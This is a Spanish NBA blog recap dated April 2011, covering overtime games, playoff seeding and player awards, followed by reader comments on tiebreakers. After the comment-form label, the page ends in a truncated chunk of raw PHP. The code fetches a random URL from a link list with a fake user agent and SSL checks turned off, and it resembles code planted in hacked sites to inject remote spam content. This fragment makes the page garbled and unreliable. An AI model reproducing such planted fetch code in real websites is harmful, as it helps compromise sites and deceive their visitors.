La Crónica (11/04/2011)

12 de April de 2011 por TheDeerHunter

Anoche asistimos a 3 duelos resueltos en la prórroga aunque posiblemente ninguno de ellos causó un infarto a un hipotético espectador.

Los Celtics asumieron que se quedan con la tercera plaza del Este y el primer cruce contra los Knicks al dar descanso a sus hombres importantes pero los reservas estuvieron a punto de aplazar lo inevitable contra Washington. O mejor dicho, los Wizards estuvieron a punto de hacerlo incluso peor que los reservas verdes (94-95).

Los Mavericks también necesitaron de prórroga para doblegar a unos flojos Rockets y adelantan virtualmente a los Lakers en la clasificación (98-91). Quizás a Phil Jackson le de por imitar a Rivers mañana y esto les sirva a los tejanos para sellar la 2ª plaza y la futura ventaja campo contra los campeones.

Por último vimos prórroga y orgía de puntos en el Minnesota@Phoenix (127-135). Barra libre defensiva y locura triplista de los Suns, con Frye y Dudley tocando la guitarra. 18 triples de 29 intentos por los Suns aunque eso sí… los rebotes que los recogiera “Rita” y de ponerse a defender ni hablamos. Si ese milagroso camino les sirviera siempre no se irían de vacaciones esta semana.

Los Heat, como ya habíamos anticipado, se aseguran la 2ª plaza del Este y a los Sixers como rival de primera ronda. LeBron ajustició a los Hawks (98-90) y les manda de cabeza a la primera ronda más dura que han tenido en años. Las sensaciones para los halcones no son precisamente de optimismo en el cruce contra Orlando. Casualmente fueron los propios Magic los que vencieron anoche al primer rival de los Heat (95-85).

Otros equipos que aún no se van de vacaciones pero que tampoco están reservando nada son los Thunder con una difícil victoria en Sacramento y la mejor versión de Durant y Westbrook (120-112); los Nuggets, que le endosaron 134 a los Warriors con 9 tíos en dobles figuras (111-134) o los Hornets, que aunque no reservan nada es como si lo hicieran. Cayeron derrotados contra Utah, 90-78.

En New Jersey tampoco a nadie le dio un pasmo ante un clutch de Augustin que sirvió para propinarles una nueva derrota (105-103) y en Detroit tampoco a nadie se le desbocó el corazón al ver a Villanueva ponerse duro cuando ya hace tiempo que no hay nada que rascar en el horizonte. El dominicano se lio a palos contra Ryan Hollins en una nueva derrota de los Pistons (110-101). Finalmente los Bucks ganaron a los Raptors, 86-93,y otra vez el mejor pasador del equipo fue Drew Gooden. Es posible que Redd se despidiera anoche de lo que ha sido su afición todos estos años, por cierto.

PREMIOS

MVP: Lebron James y Russell Westbrook llegan en plena forma a los Playoffs. El primero liquidó a los Hawks con 34 puntos, 10 rebotes, 7 asistencias y 3 robos y el segundo hizo lo propio con los Kings con 20 30 puntos, 6 rebotes y 9 asistencias. Sería una sorpresa que se enfrentaran entre ellos en Playoffs pero nunca se sabe…

Rookie: No creo que no equivoquemos si decimos que Demarcus Cousins ha sido el tercer mejor rookie del curso. Anoche, refrendó su buena temporada con 30 puntos y 9 rebotes. No nos equivocamos, ¿o sí?

Sorpresa: Luke Ridnour aprovechó los fuegos artificiales del Wolves-Suns para cuajar un partido casi perfecto. 21 puntos (10 de 13), 9 rebotes y 9 asistencias.

Decepción: No creo que los aficionados de los Hawks esten muy contentos de la actuación de ayer de Kirk Hinrich, 0 de 6 en tiros y un sólo 1 punto en todo el partido.

Esfuerzo en vano: ¿Será Rodney Stuckey otro de esos jugadores perdidos en malas actitudes y plantones a sus entrenadores? Sería una pena porque tiene mucha clase como demuestran, por ejemplo, los 29 puntos y 14 asistencias de anoche.

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. Busky23 dice:
    #1

    Como un tiro llegan los Thunder a playoffs al igual que su más que seguro rival en primera ronda,los Nuggets,los 2 equipos mas en forma del Oeste jojojo tremenda eliminatoria.
    Deer,no le quites mérito al chaval,Westbrook se ha marcado 30 points no 20 😉

      Citar

  2. Javijaen dice:
    #2

    Hay varios equipos que llegan en plena forma al final de la regular, pero los Thunder van a ser el equipo que todos tengamos en mente como “revelación”, lo importante es que sea definitiva. En el Este la verdad es que pocas sorpresas de primera ronda esperamos (ojalá Knicks), por lo que en semifinales unos Heat-Celtics y Bulls-Magic serán de infarto. En el Oeste aún hay que decidir emparejamientos. Allí habrá brillo desde primera ronda. O eso esperamos…

      Citar

  3. Vader dice:
    #3

    Ese “Calleron derrotados” en el sexto parrafo hace pupita a la vista…

    Temblad Celtics!!! Por cierto el record de los Knicks va a quedar bastante majo con ese rush final, no hemos quedado muy lejos de los Hawks.

    Saludos

      Citar

  4. Txusma dice:
    #4

    Corregido. Gracias por el aviso, Vader.

      Citar

  5. Len Bias dice:
    #5

    Qué ocurriría si…

    Dallas pierde contra New Orleans
    Lakers gana a Sacramento y pierde contra Spurs (o al revés)
    Oklahoma gana a Milwakee

    Habría triple empate a 56-26, quién sería 2º, 3º y 4º?

    (Para el que aún no lo sepa, gratis NBA League Pass hasta el día 15)

      Citar

  6. Uno cualquiera dice:
    #6

    Len:

    Si hubiera un triple empate, se miraría quien tiene mejor resultados en los partidos entre ellos.

    LAL estaría 4-2
    Dallas 3-3
    Y Oklahoma 2-4

    Si no me equivoco, esas serían las posiciones.

      Citar

  7. troll dice:
    #7

    en tiempos oscuros vuelvo a vosotros,si me recordais…..

      Citar

  8. Len Bias dice:
    #8

    Ok, pensaba que al ser triple empate se haría como en el fútbol, que cuando son más de dos los empatados ya no se miran los resultados entre ellos

      Citar

  9. Uno cualquiera dice:
    #9

    Pues juraría que en el fútbol también se hace así. Cuando son más de 2 los empatados, se miran los resultados entre todos ellos y gana el que más puntos tenga.

      Citar

  10. Denise dice:
    #10

    En el futbol tambien se hace así.
    En empate de tres o de más, se mira los puntos logrados entre sus enfrentamientos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>